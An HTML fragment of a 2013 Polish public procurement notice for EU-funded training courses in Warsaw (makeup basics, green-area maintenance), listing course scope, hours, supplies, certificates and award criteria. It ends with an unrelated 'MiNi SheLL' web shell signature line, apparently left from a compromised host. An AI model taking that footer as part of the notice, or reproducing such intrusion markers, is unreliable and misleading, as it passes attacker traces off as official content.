3.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. niezbędny podręcznik, materiał z kursu - w wersji drukowanej oraz nagrany na pamięć przenośną typu pendrive - dla uczestnika szkolenia)  
4.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla uczestnika szkolenia)
Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu na drukach Ministerstwa Edukacji i Narodowej zgodnie z rozporządzeniem MEN z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego.
Usługa będzie realizowana w terminie: od daty podpisania umowy do 20.06.2013 r.
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs podstaw wizażu - dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu (minimum):
1.Higiena pracy i pielęgnacja skóry
2.Wyposażenie stanowiska pracy
3.Profesjonalny demakijaż
4.Makijaż korekcyjny, techniki retuszowania niedoskonałości skóry
5.Sposoby aplikacji i dozowania korektora i podkładu
6.Modelowanie oraz korygowanie kształtu twarzy
7.Korygowanie łuku brwiowego, oka, ust
8.Makijaż dzienny, wieczorowy, okolicznościowy itp.
Czas trwania kursu:  min. 50 godzin
Wykonawca zapewni:  
1.przeprowadzenie kursu przez wykwalifikowaną kadrę, salę dydaktyczną 
2.sprzęt niezbędny do przeprowadzenia kursu 
3.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. niezbędny podręcznik, materiał z kursu - w wersji drukowanej oraz nagrany na pamięć przenośną typu pendrive - dla uczestnika szkolenia)  
4.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla uczestnika szkolenia)
 Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu zgodnie z rozporządzeniem MEN z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego.
Usługa będzie realizowana w terminie: od daty podpisania umowy - do 20.06.2013  r. w dni robocze  
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs konserwator terenów zielonych - dla 2 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu (minimum):
1.Podstawy biologii roślin
2.Organizacja prac ogrodniczych
3.Obsługa sprzętu ogrodniczego
4.Pielęgnacja trawników i krzewów
5.Dokonywanie cięć drzew i krzewów
6.Zakładanie ogródków skalnych
Czas trwania kursu:  min. 40 godz.
Wykonawca zapewni: 
1. przeprowadzenie kursu przez wykwalifikowaną kadrę, salę dydaktyczną 
2.sprzęt niezbędny do przeprowadzenia kursu 
3.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. niezbędny podręcznik, materiał z kursu - w wersji drukowanej oraz nagrany na pamięć przenośną typu pendrive - dla uczestnika szkolenia)  
4.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla uczestnika szkolenia)
Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu zgodnie z rozporządzeniem MEN z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych oraz egzaminem w zakresie odpowiednich uprawnień - zgodnie z obowiązującymi przepisami.  Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego.
Usługa będzie realizowana w terminie: od daty podpisania umowy do 20.06.2013 r.
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com